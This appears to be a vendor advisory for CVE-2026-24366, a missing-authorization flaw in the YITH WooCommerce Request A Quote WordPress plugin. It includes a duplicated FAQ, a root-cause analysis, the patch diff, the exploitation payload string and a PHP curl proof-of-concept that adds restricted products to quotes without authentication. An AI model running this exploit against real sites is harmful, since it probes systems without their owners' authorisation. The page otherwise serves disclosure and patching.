What is CVE-2026-24366?

CVE-2026-24366 is a medium-severity vulnerability in the YITH WooCommerce Request A Quote plugin for WordPress. It is caused by a missing authorization check in the `ajax_add_item` function, allowing unauthenticated users to add restricted products to quote requests.

How does this vulnerability work?

The vulnerability allows attackers to send a POST request to the `admin-ajax.php` endpoint with specific parameters. Due to the lack of user authentication checks, attackers can add products that should not be visible to them, bypassing WooCommerce’s visibility settings.

Who is affected by this vulnerability?

Any WordPress site using YITH WooCommerce Request A Quote version 2.46.0 or earlier is affected. Site administrators should verify their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

Check the version of the YITH WooCommerce Request A Quote plugin installed on your WordPress site. If it is version 2.46.0 or earlier, your site is vulnerable to CVE-2026-24366.

How can I fix this vulnerability?

To fix the vulnerability, update the YITH WooCommerce Request A Quote plugin to version 2.46.1 or later. This version includes a patch that adds necessary authorization checks to prevent unauthorized access.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity risk. This means that while the vulnerability could lead to unauthorized actions, the impact is limited primarily to information disclosure rather than complete data compromise.

What are the practical risks of this vulnerability?

The main risk is that unauthorized users can add restricted products to quote requests, which may expose product availability information. However, sensitive data about the products is not directly disclosed.

What is a proof of concept for this vulnerability?

A proof of concept is a script that shows how the vulnerability can be exploited. For CVE-2026-24366, it demonstrates how to send a request to add a product to a quote without authentication, confirming the flaw in the plugin.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin right away, consider disabling the plugin until a patch can be applied. Additionally, monitor your site for any unauthorized activity and restrict access to the admin area.

Is there any way to mitigate the risk without updating?

You can implement a web application firewall (WAF) to help filter malicious requests or restrict access to the `admin-ajax.php` endpoint based on user roles. However, these are not substitutes for applying the patch.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the plugin repository for updates. Staying informed will help you respond quickly to new vulnerabilities.

What is the significance of the patched version?

The patched version, 2.46.1, includes critical updates that address the missing authorization checks. Updating to this version is essential to protect your site from potential exploitation of CVE-2026-24366.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24366: YITH WooCommerce Request A Quote <= 2.46.0 – Missing Authorization (yith-woocommerce-request-a-quote)

CVE ID CVE-2026-24366

Plugin yith-woocommerce-request-a-quote

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.46.0

Patched Version 2.46.1

Disclosed January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24366:
This vulnerability is a missing authorization flaw in the YITH WooCommerce Request A Quote plugin for WordPress, affecting versions up to and including 2.46.0. The vulnerability allows unauthenticated attackers to add non-public products to a quote request, bypassing intended visibility restrictions. The CVSS score of 5.3 reflects a medium-severity impact.

Root Cause:
The vulnerability exists in the `ajax_add_item` function within `/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php`. Before the patch, the function validated only basic product ID and variation ID parameters (lines 431-432) but performed no user authentication checks. The validation logic at line 434 simply checked `$is_valid_variation`, completely ignoring the user’s authentication state and the product’s visibility status. This allowed unauthenticated users to trigger the AJAX handler via both `wp_ajax_nopriv_yith_ywraq_action` and `wp_ajax_yith_ywraq_action` hooks.

Exploitation:
Attackers exploit this vulnerability by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `yith_ywraq_action`. The request must include `product_id` and `add_item` parameters. The `product_id` parameter targets products with restricted visibility (products not publicly viewable). The payload structure is: `action=yith_ywraq_action&add_item=1&product_id=[TARGET_PRODUCT_ID]`. No authentication cookies or nonces are required due to the missing capability check.

Patch Analysis:
The patch adds an `add_item_is_valid` method (lines 475-487) and hooks it via the `ywraq_ajax_add_item_is_valid` filter (line 77). The new method checks if the current user is unauthenticated (`get_current_user_id() === 0`) and if so, validates that the product is both a valid `WC_Product` object and publicly visible via `$product->is_visible()`. The validation logic in `ajax_add_item` was modified to use this filter at line 444, replacing the simple `$is_valid_variation` check. The plugin version was incremented to 2.46.1 in the main plugin file.

Impact:
Successful exploitation allows unauthenticated attackers to add restricted products to quote requests. This bypasses WooCommerce’s product visibility settings, potentially exposing products intended only for logged-in users or specific user roles. Attackers could enumerate product IDs to discover hidden products, though the vulnerability does not directly expose sensitive product data beyond confirming a product’s existence. The impact is limited to information disclosure about product availability rather than full data access.

Differential between vulnerable and patched code

Code Diff

--- a/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php
+++ b/yith-woocommerce-request-a-quote/includes/class.yith-request-quote.php
@@ -13,7 +13,6 @@
 }

 if ( ! class_exists( 'YITH_Request_Quote' ) ) {
-
 	/**
 	 * Class YITH_Request_Quote
 	 */
@@ -76,6 +75,7 @@
 			/* ajax action. */
 			add_action( 'wp_ajax_yith_ywraq_action', array( $this, 'ajax' ) );
 			add_action( 'wp_ajax_nopriv_yith_ywraq_action', array( $this, 'ajax' ) );
+			add_filter( 'ywraq_ajax_add_item_is_valid', array( $this, 'add_item_is_valid' ), 10, 2 );

 			/* session settings. */
 			add_action( 'wp_loaded', array( $this, 'init' ) ); // Get raq after WP and plugins are loaded.
@@ -432,7 +432,17 @@
 			$product_id         = ( isset( $posted['product_id'] ) && is_numeric( $posted['product_id'] ) ) ? (int) $posted['product_id'] : false;
 			$is_valid_variation = isset( $posted['variation_id'] ) ? ! ( ( empty( $posted['variation_id'] ) || ! is_numeric( $posted['variation_id'] ) ) ) : true;

-			$is_valid = $is_valid_variation;
+			/**
+			 * APPLY_FILTERS: ywraq_ajax_add_item_is_valid
+			 *
+			 * Filter if the item to add is valid.
+			 *
+			 * @param boolean $is_valid   Check if the item to add is valid.
+			 * @param int     $product_id Product id.
+			 *
+			 * @return boolean
+			 */
+			$is_valid = apply_filters( 'ywraq_ajax_add_item_is_valid', $product_id && $is_valid_variation, $product_id );

 			if ( ! $is_valid ) {
 				$errors[] = __( 'Error occurred while adding product to Request a Quote list.', 'yith-woocommerce-request-a-quote' );
@@ -459,6 +469,23 @@
 		}

 		/**
+		 * Prevent non-authenticated users from adding non-visible products to quote
+		 *
+		 * @param bool $is_valid Product is valid for quote.
+		 * @param int  $product_id The product ID.
+		 * @return bool
+		 */
+		public function add_item_is_valid( $is_valid, $product_id ) {
+			if ( $is_valid && $product_id ) {
+				if ( get_current_user_id() === 0 ) {
+					$product  = wc_get_product( $product_id );
+					$is_valid = $product instanceof WC_Product && $product->is_visible();
+				}
+			}
+			return $is_valid;
+		}
+
+		/**
 		 * Remove an item from the list in ajax mode
 		 *
 		 * @param array $posted Request value list.
--- a/yith-woocommerce-request-a-quote/yith-woocommerce-request-a-quote.php
+++ b/yith-woocommerce-request-a-quote/yith-woocommerce-request-a-quote.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: YITH Request a Quote for WooCommerce
  * Plugin URI: https://yithemes.com/themes/plugins/yith-woocommerce-request-a-quote
- * Version: 2.46.0
+ * Version: 2.46.1
  * Author: YITH
  * Author URI: https://yithemes.com/
  * Description: <code><strong>YITH Request a Quote for WooCommerce</strong></code> lets your customers ask for an estimate of a list of products they are interested in. It allows hiding prices and/or the "Add to cart" button so that your customers can request a quote on every product page. <a href="https://yithemes.com/" target="_blank">Get more plugins for your e-commerce shop on <strong>YITH</strong></a>.
@@ -75,7 +75,7 @@
 if ( defined( 'YITH_YWRAQ_VERSION' ) ) {
 	return;
 } else {
-	define( 'YITH_YWRAQ_VERSION', '2.46.0' );
+	define( 'YITH_YWRAQ_VERSION', '2.46.1' );
 }

 if ( ! defined( 'YITH_YWRAQ_FREE_INIT' ) ) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24366 - YITH WooCommerce Request A Quote <= 2.46.0 - Missing Authorization

<?php
$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$product_id = 123; // Replace with target product ID

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'yith_ywraq_action',
    'add_item' => 1,
    'product_id' => $product_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// No authentication cookies needed
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200) {
    // Check for success indicators in response
    if (strpos($response, 'success') !== false || strpos($response, 'added') !== false) {
        echo "[+] Product $product_id successfully added to quote (VULNERABLE)n";
    } else {
        echo "[-] Request succeeded but product may not have been addedn";
    }
} else {
    echo "[-] HTTP $http_code received (may be patched)n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-24366?
Overview of the vulnerability
CVE-2026-24366 is a medium-severity vulnerability in the YITH WooCommerce Request A Quote plugin for WordPress. It is caused by a missing authorization check in the `ajax_add_item` function, allowing unauthenticated users to add restricted products to quote requests.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability allows attackers to send a POST request to the `admin-ajax.php` endpoint with specific parameters. Due to the lack of user authentication checks, attackers can add products that should not be visible to them, bypassing WooCommerce’s visibility settings.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using YITH WooCommerce Request A Quote version 2.46.0 or earlier is affected. Site administrators should verify their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
Check the version of the YITH WooCommerce Request A Quote plugin installed on your WordPress site. If it is version 2.46.0 or earlier, your site is vulnerable to CVE-2026-24366.
How can I fix this vulnerability?
Recommended actions
To fix the vulnerability, update the YITH WooCommerce Request A Quote plugin to version 2.46.1 or later. This version includes a patch that adds necessary authorization checks to prevent unauthorized access.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity risk. This means that while the vulnerability could lead to unauthorized actions, the impact is limited primarily to information disclosure rather than complete data compromise.
What are the practical risks of this vulnerability?
Potential impacts on your site
The main risk is that unauthorized users can add restricted products to quote requests, which may expose product availability information. However, sensitive data about the products is not directly disclosed.
What is a proof of concept for this vulnerability?
Demonstrating the issue
A proof of concept is a script that shows how the vulnerability can be exploited. For CVE-2026-24366, it demonstrates how to send a request to add a product to a quote without authentication, confirming the flaw in the plugin.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin right away, consider disabling the plugin until a patch can be applied. Additionally, monitor your site for any unauthorized activity and restrict access to the admin area.
Is there any way to mitigate the risk without updating?
Alternative protective measures
You can implement a web application firewall (WAF) to help filter malicious requests or restrict access to the `admin-ajax.php` endpoint based on user roles. However, these are not substitutes for applying the patch.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the plugin repository for updates. Staying informed will help you respond quickly to new vulnerabilities.
What is the significance of the patched version?
Importance of updates
The patched version, 2.46.1, includes critical updates that address the missing authorization checks. Updating to this version is essential to protect your site from potential exploitation of CVE-2026-24366.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations